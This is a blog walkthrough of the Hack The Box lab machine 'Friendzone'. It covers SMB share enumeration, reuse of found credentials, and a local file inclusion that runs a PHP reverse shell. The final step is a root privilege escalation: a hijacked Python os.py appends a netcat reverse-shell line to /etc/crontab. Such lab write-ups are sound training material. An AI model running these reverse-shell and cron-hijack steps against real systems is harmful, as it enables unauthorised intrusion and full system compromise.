Friendzone

Again, we start with nmap -sC -sV -oA ./friendzone 10.10.10.123

SMB, DNS, HTTP and HTTPS.  Let's start with web services and SMB.  A quick smbclient -L 10.10.10.123 show us a few shares

  smbclient -L 10.10.10.123
  Enter WORKGROUP\kali's password:
 
          Sharename       Type      Comment
          ---------       ----      -------
          print$          Disk      Printer Drivers
          Files           Disk      FriendZone Samba Server Files /etc/Files
          general         Disk      FriendZone Samba Server Files
          Development     Disk      FriendZone Samba Server Files
          IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
  SMB1 disabled -- no workgroup available

One interesting note is the Comment section on the Files share.  It shows the actual location which is CVE-2000-0649. The actual location is /etc/Files.  The web service on HTTP show us a static page and HTTPS shows not found

Let's try connecting to the SMB shares and see what's available.  We can connect to the general share and we find a creds.txt file there.

  smbclient -N \\\\10.10.10.123\\general
  Try "help" to get a list of possible commands.
  smb: \> dir
    .                                   D        0  Wed Jan 16 15:10:51 2019
    ..                                  D        0  Wed Jan 23 16:51:02 2019
    creds.txt                           N       57  Tue Oct  9 19:52:42 2018
 
                  9221460 blocks of size 1024. 6458412 blocks available
  smb: \> get creds.txt
  getting file \creds.txt of size 57 as creds.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
  smb: \> exit
  kali@kali:~/Friendzone$ cat creds.txt
  creds for the admin THING:
 
  admin:WORKWORKHhallelujah@#
 
We can't connect to Files and Development is empty.

That's everything we can do with SMB right now.  Let's try DNS.  The start page has an email address at friendzone.red so let's try zone transferring it for more info.

Let's add friendzone.red to our HOSTS file and see if we can get to an HTTPS page.

After accepting the self-signed certificate, we have an HTTPS page!  Getting warmer.  Let's check the other sub-domains of uploads, hr, and administrator1. We can access uploads and administrator1, but HR fails with not found.  On the administrator1.friendzone.red page, let's try the creds we found on the general share. We can log in and it tells us to visit dashboard.php.

If I'm following the logic correctly, we upload files in the Uploads page and can access it from the Administrator1 page.  The dashboard even gives us the handy identifiers of image_id and pagename.  I tried uploading php shell pages, but they all failed.  I wonder if we can manipulate one of those parameters to get a local file inclusion (LFI).  Let's try it.  Using smbclient -N \\\\10.10.10.123\\Development we try putting the PHP-reverse-shell from Pentest Monkey
http://pentestmonkey.net/tools/web-shells/php-reverse-shell onto the Development share.  Now to figure out how to execute it.  We know that Files is /etc/Files.  It stands to reason that Development is actually /etc/Development.  So, we would likely need to execute /etc/Development/phprs.php (I shortened the name for easier typeout).  Start a netcat listener and then see if that path is accessible in the pagename parameter.

  https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/phprs

Excellent!  www-data shell.  Move LinEnum.sh over to the target (either through python3 http.service or using SMB to Development and then moving it to /tmp).  The results are in the CherryTree file.  Digging through the output, I don't see anything that jumps out so let's check running processes with pspy.  After a few minutes, we see a cron job running reporter.py as root.  Let's check that out.

  cat /opt/server_admin/reporter.py
  #!/usr/bin/python

  import os
 
  to_address = "admin1@friendzone.com"
  from_address = "admin2@friendzone.com"

  print "[+] Trying to send email to %s"%to_address
 
  #command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

  #os.system(command)
 
  # I need to edit the script later
  # Sam ~ python developer
 
Looks like it just sends a mail message.  Nothing useful on its own, but if we combine it with lines 150 and 1338 of the LinEnum output, we see that we can modify os.py that this script calls on.  Let's use that to hijack crontab.  Create an os.py on your machine with this code, and then SMB put the new file into /etc/Development on the Target

  shell = '''
  * * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1| nc 10.10.XX.XX 9991 > /tmp/f
  '''
  f = open('/etc/crontab','a')
  f.write(shell)
  f.close()

Now we copy our os.py over to /usr/lib/Python2.7/os.py, start a netcat listener, and wait for the fireworks.  Kaboom.  Root shell.

©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
  Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
  This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
  This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity

(GET WRITTEN PERMISSION PEOPLE!!)
  Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
  Contact the external sites for answers to questions regarding its content.
  This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.